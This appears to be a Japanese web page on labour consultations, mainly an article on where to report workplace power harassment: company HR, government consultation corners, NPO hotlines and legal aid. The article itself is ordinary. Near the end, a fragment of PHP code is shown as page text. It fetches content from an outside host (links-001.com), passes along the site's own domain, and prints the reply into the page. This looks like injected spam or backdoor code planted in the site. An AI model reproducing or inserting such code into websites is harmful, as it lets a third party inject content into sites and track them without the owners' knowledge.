前へ
次へ

工夫すればすぐできる労働相談

どうしても今働いている会社の問題を解決したいのであれば、労働相談をしてもらえる法律事務所を探しましょ

more

労働相談で相談出来ること

労働相談では、不当解雇や雇止めについて相談出来ることはもちろんですが、昇進や昇格についても相談するこ

more

労働相談ができる場所の種類

労働相談をしたいと考えているのであれば、まず始めに思い浮かべるのが労働基準監督署ではないでしょうか。

more

パワハラの労働相談はどこでやればいいのか

近年ではパワハラに関する労働相談の件数が増えてきています。
その要因として今まで泣き寝入りしていた人が、重たる場所で相談するケースが増えてきているということがあります。
それだけでなく、パワハラという言葉が多くの人に知れ渡っていたということがあります。
パワハラの相談として挙がっていることは、精神的な攻撃や過大な要求、人間関係の切り離しの順で多くなっており、上司から身体的な被害を受けたという事例は意外と少ないです。
相手の人格を否定する暴言など精神的な攻撃が半数以上を占めています。
上司からすると教育に該当するかもしれませんが、パワハラを受けた部下にとっては侮辱されたと感じるものです。
多くの人は暴言を吐かれることによって悩んでいると言ってもいいでしょう。
過大な要求とは達成することが困難な無茶苦茶なノルマが課せれることで、それを達成できなければ精神的な攻撃を受けることになります。
人間関係の切り離しとはその人だけを無視したり排除したりするということで、学校時代のいじめと似たような構図です。
どちらにしてもパワハラであることには変わりありませんので、何らかの手を打つことが求められます。
パワハラに関する労働相談の窓口はさまざまありますが、自分の会社で解決することができるのであれば、人事部やコンプライアンス部門に相談するのがいいでしょう。
大きな会社であればこういう部署が存在しているはずですので、パワハラを受けている旨の報告をすることで、調査が入ることになります。
会社で解決することが見込めないのであれば、厚生労働省の総合労働相談コーナーやNPO法人労働相談センターに無料での電話相談をしてみるといいでしょう。
ひとまず相談したいということであれば、これらの機関で構いません。
法的に訴えたいという希望があるならば、法テラスに相談をしてみてください。
パワハラの相談窓口が増えてきていますので、気軽に相談をしてみるのが一番いいです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top